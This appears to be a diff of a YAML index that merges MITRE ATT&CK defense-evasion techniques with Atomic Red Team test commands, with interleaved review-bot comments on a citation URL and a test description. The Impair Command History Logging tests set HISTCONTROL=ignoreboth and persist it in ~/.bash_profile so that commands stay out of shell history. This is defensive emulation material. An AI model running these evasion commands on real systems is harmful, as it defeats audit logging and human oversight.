+ On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
+
+ Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
+
+ Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
+ id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-03-29T22:32:25.985Z'
+ created: '2020-02-26T17:46:13.128Z'
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
- File monitoring
- x_mitre_defense_bypassed:
- - Host forensic analysis
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor the file system and shell commands for files being
+ created with a leading "." and the Windows command-line use of attrib.exe
+ to add the hidden attribute.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
identifier: T1564.001
atomic_tests:
- name: Create a hidden file in a hidden directory
@@ -26954,9 +30693,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1564.002
url: https://attack.mitre.org/techniques/T1564/002
- - url: https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty
+ - url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved
- July 8, 2017.
+ July 31, 2020.
source_name: Cybereason OSX Pirrit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
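Review bot: The replacement citation on the `+ - url:` line is a plain `http://` link where the removed one was `https://`, so a reader following the reference fetches the PDF without transport integrity; the same downgrade appears in the hunk at `@@ -27131,9 +30861,9 @@`. If this index is regenerated from the upstream ATT&CK STIX bundle, the value should be corrected in the generator or upstream rather than here, otherwise `https://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf` is the fix, provided the host serves it over TLS.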
@@ -26971,7 +30710,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T22:36:25.994Z'
+ modified: '2020-07-31T17:42:43.768Z'
created: '2020-03-13T20:12:40.876Z'
x_mitre_data_sources:
- File monitoring
@@ -27114,15 +30853,6 @@ defense-evasion:
name: powershell
T1564:
technique:
- id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
- description: |-
- Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
-
- Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
- name: Hide Artifacts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1564
@@ -27131,9 +30861,9 @@ defense-evasion:
description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
source_name: Sofacy Komplex Trojan
- - url: https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty
+ - url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved
- July 8, 2017.
+ July 31, 2020.
source_name: Cybereason OSX Pirrit
- url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams.
@@ -27143,22 +30873,21 @@ defense-evasion:
url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys
virtual machine to dodge security. Retrieved June 29, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Hide Artifacts
+ description: |-
+ Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
+
+ Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
+ id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-06T19:03:40.511Z'
+ modified: '2020-09-23T11:31:50.636Z'
created: '2020-02-26T17:41:25.933Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor files, processes, and command-line arguments for
- actions indicative of hidden artifacts. Monitor event and authentication logs
- for records of hidden artifacts being used. Monitor the file system and shell
- commands for hidden attribute usage.
x_mitre_data_sources:
- API monitoring
- PowerShell logs
@@ -27166,6 +30895,16 @@ defense-evasion:
- Process command-line parameters
- Process monitoring
- File monitoring
+ x_mitre_detection: Monitor files, processes, and command-line arguments for
+ actions indicative of hidden artifacts. Monitor event and authentication logs
+ for records of hidden artifacts being used. Monitor the file system and shell
+ commands for hidden attribute usage.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574:
technique:
@@ -27194,7 +30933,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-26T16:09:59.324Z'
+ modified: '2020-10-17T15:15:28.288Z'
created: '2020-03-12T20:38:12.465Z'
x_mitre_data_sources:
- Environment variable
@@ -27225,6 +30964,134 @@ defense-evasion:
- macOS
- Windows
atomic_tests: []
+ T1562.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1562.003
+ url: https://attack.mitre.org/techniques/T1562/003
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - source_name: Microsoft PowerShell Command History
+ url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
+ description: Microsoft. (2020, May 13). About History. Retrieved September
+ 4, 2020.
+ - source_name: Sophos PowerShell command audit
+ url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
+ description: jak. (2020, June 27). Live Discover - PowerShell command audit.
+ Retrieved August 21, 2020.
+ - source_name: Sophos PowerShell Command History Forensics
+ url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
+ description: Vikas, S. (2020, August 26). PowerShell Command History Forensics.
+ Retrieved September 4, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Impair Command History Logging
+ description: "Adversaries may impair command history logging to hide commands
+ they run on a compromised system. Various command interpreters keep track
+ of the commands users type in their terminal so that users can retrace what
+ they've done. \n\nOn Linux and macOS, command history is tracked in a file
+ pointed to by the environment variable HISTFILE. When a user
+ logs off a system, this information is flushed to a file in the user's home
+ directory called ~/.bash_history. The HISTCONTROL
+ environment variable keeps track of what should be saved by the history
+ command and eventually into the ~/.bash_history file when a user
+ logs out. HISTCONTROL does not exist by default on macOS, but
+ can be set by the user and will be respected.\n\nAdversaries may clear the
+ history environment variable (unset HISTFILE) or set the command
+ history size to zero (export HISTFILESIZE=0) to prevent logging
+ of commands. Additionally, HISTCONTROL can be configured to ignore
+ commands that start with a space by simply setting it to \"ignorespace\".
+ HISTCONTROL can also be set to ignore duplicate commands by setting
+ it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\"
+ which covers both of the previous examples. This means that “ ls” will not
+ be saved, but “ls” would be saved by history. Adversaries can abuse this to
+ operate without leaving traces by simply prepending a space to all of their
+ terminal commands.\n\nOn Windows systems, the PSReadLine module
+ tracks commands used in all PowerShell sessions and writes them to a file
+ ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
+ by default). Adversaries may change where these logs are saved using Set-PSReadLineOption
+ -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt
+ to stop receiving logs. Additionally, it is possible to turn off logging to
+ this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle
+ SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation:
+ Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History
+ Forensics)"
+ id: attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-16T18:25:12.727Z'
+ created: '2020-02-21T20:56:06.498Z'
+ x_mitre_contributors:
+ - Vikas Singh, Sophos
+ - Emile Kenning, Sophos
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Log analysis
+ x_mitre_detection: "Correlating a user session with a distinct lack of new commands
+ in their .bash_history can be a clue to suspicious behavior.
+ Additionally, users checking or changing their HISTCONTROL, HISTFILE,
+ or HISTFILESIZE environment variables may be suspicious.\n\nMonitor
+ for modification of PowerShell command history settings through processes
+ being created with -HistorySaveStyle SaveNothing command-line
+ arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle
+ SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. "
+ x_mitre_data_sources:
+ - PowerShell logs
+ - Process command-line parameters
+ - Environment variable
+ - File monitoring
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ identifier: T1562.003
+ atomic_tests:
+ - name: Disable history collection
+ auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
+ description: 'Disables history collection in shells
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ evil_command:
+ description: Command to run after shell history collection is disabled
+ type: String
+ default: whoami
+ executor:
+ command: |
+ export HISTCONTROL=ignoreboth
+ #{evil_command}
+ name: sh
+ - name: Mac HISTCONTROL
+ auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
+ description: "The HISTCONTROL variable is set to ignore (not write to the history
+ file) command that are a duplicate of something already in the history \nand
+ commands that start with a space. This atomic sets this variable in the current
+ session and also writes it to the current user's ~/.bash_profile \nso that
+ it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n"
+ supported_platforms:
+ - macos
+ - linux
+ executor:
+ steps: |
+ 1. export HISTCONTROL=ignoreboth
+ 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
+ 3. ls
+ 4. whoami > recon.txt
+ name: manual
T1562:
technique:
id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529
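Review bot: The `Disable history collection` test's description (`'Disables history collection in shells'`) overstates what its command does: `export HISTCONTROL=ignoreboth` only keeps space-prefixed and duplicate commands out of the history, as the technique description in this same hunk explains, and because the executor is a non-interactive `sh` the export most likely touches no history file at all, so the test demonstrates the command pattern rather than the outcome. A description such as `'Sets HISTCONTROL=ignoreboth so that commands prefixed with a space (and duplicates) are not recorded in bash history'` would be accurate. The `Mac HISTCONTROL` manual test appends to `~/.bash_profile` and writes `recon.txt` with no cleanup steps, so every run leaves a persistent change and another duplicate line behind; listing the revert (remove the appended line and `recon.txt`) in the steps or description would let it be run repeatedly on a lab host. HISTCONTROL is also a bash variable, so the description should note that the `~/.bash_profile` change has no effect where the login shell is not bash.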
@@ -27244,7 +31111,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-09T14:43:42.718Z'
+ modified: '2020-10-19T16:31:35.249Z'
created: '2020-02-21T20:22:13.470Z'
x_mitre_platforms:
- Linux
@@ -27505,7 +31372,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T21:43:29.196Z'
+ modified: '2020-10-16T18:09:49.074Z'
created: '2017-05-31T21:30:55.892Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -27548,8 +31415,19 @@ defense-evasion:
elevation_required: true
T1202:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2018-04-18T17:59:24.739Z'
+ modified: '2020-06-20T22:09:22.559Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
external_references:
- source_name: mitre-attack
external_id: T1202
@@ -27566,40 +31444,29 @@ defense-evasion:
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
source_name: RSA Forfiles Aug 2017
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- name: Indirect Command Execution
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-06-20T22:09:22.559Z'
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application control
+ - Application control by file name or path
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- Windows event logs
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application control
- - Application control by file name or path
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ x_mitre_version: '1.1'
identifier: T1202
atomic_tests:
- name: Indirect Command Execution - pcalua.exe
@@ -28532,6 +32399,21 @@ defense-evasion:
name: powershell
T1036.001:
technique:
+ created: '2020-02-10T19:49:46.752Z'
+ modified: '2020-02-10T19:52:47.724Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52
+ description: |-
+ Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
+
+ Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.
+ name: Invalid Code Signature
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1036.001
@@ -28540,34 +32422,19 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Invalid Code Signature
- description: |-
- Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
-
- Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.
- id: attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-02-10T19:52:47.724Z'
- created: '2020-02-10T19:49:46.752Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: Collect and analyze signing certificate metadata and check
- signature validity on software that executes within the environment, look
- for invalid signatures as well as unusual certificate characteristics and
- outliers.
+ x_mitre_platforms:
+ - macOS
+ - Windows
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Binary file metadata
- x_mitre_platforms:
- - macOS
- - Windows
+ x_mitre_detection: Collect and analyze signing certificate metadata and check
+ signature validity on software that executes within the environment, look
+ for invalid signatures as well as unusual certificate characteristics and
+ outliers.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1149:
technique:
@@ -28637,6 +32504,12 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-640
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/640.html
- source_name: Man LD.SO
url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
@@ -28666,7 +32539,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-15T21:59:25.358Z'
+ modified: '2020-09-16T16:49:46.904Z'
created: '2020-03-13T20:09:59.569Z'
x_mitre_platforms:
- Linux
@@ -28679,7 +32552,7 @@ defense-evasion:
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -29431,7 +33304,7 @@ defense-evasion:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-13T21:23:01.762Z'
+ modified: '2020-10-21T02:41:11.743Z'
created: '2020-02-11T19:01:56.887Z'
x_mitre_data_sources:
- File monitoring
@@ -29462,12 +33335,13 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g., a user has an active
login session but has not entered the building or does not have VPN access)."
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
+ - Network
atomic_tests: []
T1578:
technique:
@@ -29477,8 +33351,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1578
- source_name: Mandiant M-Trends 2020
url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -29492,7 +33366,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-19T14:46:00.117Z'
+ modified: '2020-09-14T19:55:23.798Z'
created: '2019-08-30T18:03:05.864Z'
x_mitre_detection: Establish centralized logging for the activity of cloud compute
infrastructure components. Monitor for suspicious sequences of events, such
@@ -29569,7 +33443,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T22:52:55.930Z'
+ modified: '2020-08-13T20:02:49.641Z'
created: '2017-05-31T21:31:23.587Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -29581,7 +33455,7 @@ defense-evasion:
x_mitre_detection: |-
Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
- Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
+ Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).
x_mitre_defense_bypassed:
@@ -29596,7 +33470,7 @@ defense-evasion:
- Bartosz Jerzman
- Travis Smith, Tripwire
- David Lu, Tripwire
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
@@ -29725,6 +33599,65 @@ defense-evasion:
'
name: powershell
+ T1601:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1601
+ url: https://attack.mitre.org/techniques/T1601
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Modify System Image
+ description: |-
+ Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
+
+ To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.
+ id: attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-22T17:50:47.635Z'
+ created: '2020-10-19T19:42:19.740Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: "Most embedded network devices provide a command to print
+ the version of the currently running operating system. Use this command to
+ query the operating system for its version number and compare it to what is
+ expected for the device in question. Because this method may be used in conjunction
+ with [Patch System Image](https://attack.mitre.org/techniques/T1601/001),
+ it may be appropriate to also verify the integrity of the vendor provided
+ operating system image file. \n\nCompare the checksum of the operating system
+ file with the checksum of a known good copy from a trusted source. Some embedded
+ network device platforms may have the capability to calculate the checksum
+ of the file, while others may not. Even for those platforms that have the
+ capability, it is recommended to download a copy of the file to a trusted
+ computer to calculate the checksum with software that is not compromised.
+ \ (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany
+ vendors of embedded network devices can provide advanced debugging support
+ that will allow them to work with device owners to validate the integrity
+ of the operating system running in memory. If a compromise of the operating
+ system is suspected, contact the vendor technical support and seek such services
+ for a more thorough inspection of the current running system. (Citation:
+ Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)"
+ x_mitre_data_sources:
+ - Network device run-time memory
+ - Network device configuration
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1218.005:
technique:
id: attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade
@@ -30388,6 +34321,151 @@ defense-evasion:
'
name: powershell
+ T1599.001:
+ technique:
+ created: '2020-10-19T16:48:08.241Z'
+ modified: '2020-10-21T01:45:58.951Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de
+ description: "Adversaries may bridge network boundaries by modifying a network
+ device’s Network Address Translation (NAT) configuration. Malicious modifications
+ to NAT may enable an adversary to bypass restrictions on traffic routing that
+ otherwise separate trusted and untrusted networks.\n\nNetwork devices such
+ as routers and firewalls that connect multiple networks together may implement
+ NAT during the process of passing packets between networks. When performing
+ NAT, the network device will rewrite the source and/or destination addresses
+ of the IP address header. Some network designs require NAT for the packets
+ to cross the border device. A typical example of this is environments where
+ internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen
+ an adversary gains control of a network boundary device, they can either leverage
+ existing NAT configurations to send traffic between two separated networks,
+ or they can implement NAT configurations of their own design. In the case
+ of network designs that require NAT to function, this enables the adversary
+ to overcome inherent routing limitations that would normally prevent them
+ from accessing protected systems behind the border device. In the case of
+ network designs that do not require NAT, address translation can be used by
+ adversaries to obscure their activities, as changing the addresses of packets
